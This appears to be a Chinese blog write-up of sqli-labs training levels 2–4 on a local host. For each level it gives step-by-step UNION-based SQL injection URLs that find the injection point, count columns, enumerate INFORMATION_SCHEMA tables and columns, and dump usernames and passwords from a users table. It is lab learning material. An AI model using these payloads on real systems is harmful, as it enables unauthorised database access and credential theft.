sqli-labs-master 第二关+第三关+第四关
sixyearsorless 2020-05-07
sqli-labs-master 第二关+第三关+第四关
实验2
1. 判断注入点
http://localhost/sql/Less-2/?id=1 加入‘报错提醒,知道数据库的类型,根据报错信息,我们可以知道输入参数的内容被存放到数字里
2. 判断ID类型
http://localhost/sql/Less-2/?id=0 and 1 = 1 显示正常,我们可以知道ID类型是数字类型
3. 猜测匹配列数
http://localhost/sql/Less-1/?id=0 UNION SELECT 1,2,3 %23 匹配成功,我们知道列数是3
4. 获取数据库信息
通过查询我们知道数据库名和管理员用户名 http://localhost/sql/Less-2/?id=0 UNION SELECT 1, database(), user() %23
5.猜测表名
通过查询我们知道了用户表名为users http://localhost/sql/Less-2/?id=0 UNION SELECT 1, database(), table_name FROM INFORMATION_SCHEMA.Tables WHERE Table_schema = ‘security‘ limit 3,1 %23
6.查找我们想知道的列
http://localhost/sql/Less-2/?id=0 UNION SELECT 1, database(), column_name FROM INFORMATION_SCHEMA.Columns WHERE Table_Schema = ‘security‘ And Table_Name = ‘users‘ limit 0,1 %23
7.爆库
http://localhost/sql/Less-2/?id=0 UNION SELECT 1,username, password from users limit 5,1 %23
实验3
1. 判断注入点
http://localhost/sql/Less-3/?id=1‘) %23 加入‘报错提醒,知道数据库的类型,根据报错信息,我们可以知道输入参数的内容被存放到(‘中
2. 判断ID类型
http://localhost/sql/Less-3/?id=0‘) and (‘1‘)=1%23
3. 猜测匹配列数
http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1,2,3 %23 匹配成功,我们知道列数是3
4. 获取数据库信息
通过查询我们知道数据库名和管理员用户名 http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1,database(), user() %23
5.猜测表名
通过查询我们知道了用户表名为users http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1, database(), table_name FROM INFORMATION_SCHEMA.Tables WHERE Table_schema = ‘security‘ limit 3,1 %23
6.查找我们想知道的列
http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1, database(), column_name FROM INFORMATION_SCHEMA.Columns WHERE Table_Schema = ‘security‘ And Table_Name = ‘users‘ limit 0,1 %23
7.爆库
http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1,username, password from users limit 5,1 %23
实验4
1. 判断注入点
http://localhost/sql/Less-4/?id=1"%23
加入‘报错提醒,知道数据库的类型,根据报错信息,我们可以知道输入参数的内容被存放到("中2. 判断ID类型
http://localhost/sql/Less-4/?id=0") and ("1")=1%233. 猜测匹配列数
http://localhost/sql/Less-4/?id=0") UNION SELECT 1,2,3 %23 匹配成功,我们知道列数是3
4. 获取数据库信息
通过查询我们知道数据库名和管理员用户名 http://localhost/sql/Less-4/?id=0") UNION SELECT 1,database(), user() %23
5.猜测表名
通过查询我们知道了用户表名为users http://localhost/sql/Less-4/?id=0") UNION SELECT 1, database(), table_name FROM INFORMATION_SCHEMA.Tables WHERE Table_schema = ‘security‘ limit 3,1 %23
6.查找我们想知道的列
http://localhost/sql/Less-4/?id=0") UNION SELECT 1, database(), column_name FROM INFORMATION_SCHEMA.Columns WHERE Table_Schema = ‘security‘ And Table_Name = ‘users‘ limit 0,1 %23
7.爆库
http://localhost/sql/Less-4/?id=0") UNION SELECT 1,username, password from users limit 5,1 %23
相关推荐
专注前端开发 0喜欢 / 0评论 2020-10-21
苏康申 0喜欢 / 0评论 2020-11-13
vitasfly 0喜欢 / 0评论 2020-11-12
oraclemch 0喜欢 / 0评论 2020-11-06
liuyang000 0喜欢 / 0评论 2020-09-25
FellowYourHeart 0喜欢 / 0评论 2020-10-05
赵继业 0喜欢 / 0评论 2020-08-17
whyname 0喜欢 / 0评论 2020-08-16
Seandba 0喜欢 / 0评论 2020-08-16
dbasunny 0喜欢 / 0评论 2020-08-16
拼命工作好好玩 0喜欢 / 0评论 2020-08-15
langyue 0喜欢 / 0评论 2020-08-15
写程序的赵童鞋 0喜欢 / 0评论 2020-08-03
Accpcjg 0喜欢 / 0评论 2020-08-02
tydldd 0喜欢 / 0评论 2020-07-30
好记忆也需烂 0喜欢 / 0评论 2020-07-28
jianghero 0喜欢 / 0评论 2020-07-28
variab 0喜欢 / 0评论 2020-07-28
xiuyangsong 0喜欢 / 0评论 2020-07-26
gsmfan 0喜欢 / 0评论 2020-07-26
ztyzly00 0喜欢 / 0评论 2020-07-21
Dullonjiang 0喜欢 / 0评论 2020-07-19
sunysh00 0喜欢 / 0评论 2020-07-18
Dullonjiang 0喜欢 / 0评论 2020-07-08
LuckyDeng 0喜欢 / 0评论 2020-07-08
明月清风精进不止 0喜欢 / 0评论 2020-07-05
FORYAOSHUYUN 0喜欢 / 0评论 2020-07-05
URML 0喜欢 / 0评论 2020-07-04
Dimples 0喜欢 / 0评论 2020-06-28
ItBJLan 0喜欢 / 0评论 2020-06-28
BiPerler 0喜欢 / 0评论 2020-06-28
zhaojp0 0喜欢 / 0评论 2020-06-27
xiaoxiangyu 0喜欢 / 0评论 2020-06-26
hxw0 0喜欢 / 0评论 2020-06-26
msmysql 0喜欢 / 0评论 2020-06-26
娜娜 0喜欢 / 0评论 2020-06-22
李永毅 0喜欢 / 0评论 2020-06-21
CSDN0BLOG 0喜欢 / 0评论 2020-06-21
minggehenhao 0喜欢 / 0评论 2020-06-21
goodriver 0喜欢 / 0评论 2020-06-17
ItBJLan 0喜欢 / 0评论 2020-06-16
luobotoutou 0喜欢 / 0评论 2020-06-16
xuanlvhaoshao 0喜欢 / 0评论 2020-06-16
hungzz 0喜欢 / 0评论 2020-06-16